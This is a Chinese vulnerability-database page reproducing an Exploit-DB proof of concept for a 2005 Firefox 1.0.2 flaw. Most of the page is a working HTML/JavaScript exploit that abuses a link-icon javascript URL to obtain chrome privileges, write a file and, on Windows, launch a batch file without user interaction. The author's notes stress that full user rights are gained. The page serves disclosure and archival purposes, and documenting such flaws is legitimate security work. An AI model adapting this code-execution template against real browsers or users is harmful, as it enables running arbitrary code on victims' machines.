Mozilla Browsers – x (Link) Code Execution-安全小百科

Mozilla Browsers – x (Link) Code Execution

漏洞ID	1055014	漏洞类型
发布时间	2005-04-18	更新时间	2005-04-18
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/943

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

<!--
Comment placed below to keep the author info together:
/str0ke 

__Contact Informations

Michael Krax <[email protected]>
http://www.mikx.de/?p=15

mikx
-->

<html>
<head>
	<title>Firelinking - Proof-of-Concept</title>
    <link rel="SHORTCUT ICON" href="favicon.ico">    
    <script language="JavaScript" type="text/javascript">
    var pf = navigator.platform.toLowerCase();
    if (pf.indexOf("win") != -1) {
        var os = "win";
    } else if (pf.indexOf("mac") != -1) {
        var os = "mac";
    } else {
        var os = "linux"
    }
    function runDemo() {
        // this is an ugly caching workaround
        document.getElementById('outhtml').innerHTML = "";
        document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
        document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
        document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
        window.setTimeout("document.getElementById('outhtml').innerHTML += document.getElementById('linkhtml_"+os+"').value",300);
    } 
    </script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firelinking - Proof-of-Concept</div>

Designed for Firefox 1.0.2 | bugzilla <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=290036" target="_blank">#290036</a>
<br><br>
<div style="width:600px">

<div id="outhtml" style="display:none"></div>

<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>

<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\booom.bat');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes['@mozilla.org/network/file-output-stream;1'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output='@ECHO OFF\n:BEGIN\nCLS\nDIR\nPAUSE\n:END';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
</textarea>

<textarea id="linkhtml_mac" style="display:none">

<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('/booom.txt');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes['@mozilla.org/network/file-output-stream;1'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output='booom!';outputStream.write(output,output.length);outputStream.close();','','')">
</textarea>

<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('~/booom.txt');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes['@mozilla.org/network/file-output-stream;1'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output='booom!';outputStream.write(output,output.length);outputStream.close();','','')">
</textarea>


<strong><u>NOTICE:</u></strong> I really wonder why the Mozilla Foundation decided to release a serious security update on a friday night and to disclose the link to my proof-of-concept code so quickly. It wasn't intendet from my side to release this as a 0day exploit. Please complain to <a href="mailto:[email protected]">[email protected]</a> if you disagree with their release policy. Sorry, no CVE candidate number yet for that reason.
<br><br><br>
The link tag allows to load a custom image as the icon for a website, displayed in the location bar and in the tab title. 
<br><br>

By setting the href attribute of this tag to a javascript url, it is possible to call chrome functions and run arbitrary code without user interaction. 
<br><br>
The example is cross platform: On Windows this example creates the file c:booom.bat and launches it (opens a dos box with a dir command). On Linux (tested Fedora Core) and MacOSX the example creates the file ~/booom.txt or /booom.txt. 
<br><br>
The non-windows examples are only roughly tested. Please don't complain if not working. I doubt every Mac user can write to root by default. You get full user rights with UniversalXPConnect, so everything else is just a matter of implementation time.
<br><br>
<a href="#" onclick="runDemo();runDemo();">Run example</a> (cross platform)
<br><br><br>

</div>
</body>
</html>

# milw0rm.com [2005-04-18]

相关推荐: SuSEConfig.postfix chroot File Ownership Vulnerability

SuSEConfig.postfix chroot File Ownership Vulnerability 漏洞ID 1102765 漏洞类型 Configuration Error 发布时间 2001-12-05 更新时间 2001-12-05 CVE编号…

文章版权归作者所有，未经允许请勿转载。

THE END